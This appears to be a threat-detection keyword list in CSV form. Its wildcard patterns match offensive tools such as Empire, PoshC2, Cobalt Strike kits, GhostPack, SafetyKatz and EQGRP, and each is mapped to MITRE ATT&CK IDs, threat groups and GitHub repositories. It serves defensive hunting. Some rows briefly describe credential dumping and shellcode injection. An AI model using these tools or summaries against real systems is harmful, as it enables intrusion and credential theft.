- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegLastLoggedOn*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z 
-*get-wmireglastloggedon*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-WMIRegMountedDrive*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-wmiregmounteddrive*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-WorkingHours*,offensive_tool_keyword,empire,empire function name of 
agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*gexplorer.exe*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z
-*ggackgngljinccllcmbgnpgpllcjepgc*,greyware_tool_keyword,WindmillVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*ghost_* -v*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z
-*ghost_sparc*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z
-*ghost_x86*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z
-*ghost01.hwtxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*GhostInTheNet off*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z
-*GhostInTheNet on*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z
-*GhostInTheNet.sh *,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z
-*GhostPack*,offensive_tool_keyword,GhostPack,A collection of security related toolsets.with known hacktools,T1055 - T1203 - T1218 - T1560,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/GhostPack,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*GhostPack/ForgeCert*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z
-*GhostPack/Koh*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z
-*GhostPack/SafetyKatz*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z
-*GhostPack/Seatbelt*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z
-*GhostPack/SharpDPAPI*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z
-*Ghostpack-CompiledBinaries*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z
-*GhostWebShell.cs*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z
-*gimmecredz*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z
-*ginuerzh/gost*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,1,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*Gioyik/getExploit*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z
-*git log -p | scanrepo *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*github*/COMHunter/*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*github*/DeathStar*,offensive_tool_keyword,DeathStar,DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.,T1078 - T1059 - T1047 - T1018 - T1069,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/byt3bl33d3r/DeathStar,1,0,N/A,N/A,10,1529,339,2022-12-08T07:44:30Z,2017-05-21T07:34:57Z
-*github*/MoveKit.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z
-*github*/Mr-xn/*,offensive_tool_keyword,spring-core-rce,github user infosec hosting exploitation tools,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z
-*github*/padre.git*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z
-*github*/xmrig/xmrig*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z
-*github.com/*Reaper.exe*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z
-*github.com/Arno0x*,offensive_tool_keyword,Github Username,Github username known for exploitation toos and scripts,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Arno0x,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/BishopFox*,offensive_tool_keyword,Github Username,Private professional services firm providing offensive security testing to the Fortune 500. serving exploitation tools on github,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/BishopFox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/bishopfox/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*github.com/dafthack*,offensive_tool_keyword,Github Username,Github user hosting exploitation tools for pentest and redteam,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/dafthack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/g3tsyst3m*,offensive_tool_keyword,elevationstation,github user hosting multiple exploitation tools,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*github.com/GoSecure*,offensive_tool_keyword,Github Username,github repo name containing multiple exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/GoSecure,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/k8gege*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*github.com/MythicAgents/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*github.com/nccgroup*,offensive_tool_keyword,Github Username,github repo name hosting securty tools and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/nccgroup,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/quickbreach*,offensive_tool_keyword,Github Username,An infosec security researcher & penetration tester. hosting offensive tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/quickbreach,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/rasta-mouse/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z
-*github.com/sensepost*,offensive_tool_keyword,Github Username,github repo of orange cyberdefense red team,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sensepost,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*github.com/SpiderLabs/*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z
-*github.io/weakpass/generator/*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z
-*GithubC2-main*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z
-*gitleaks detect*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
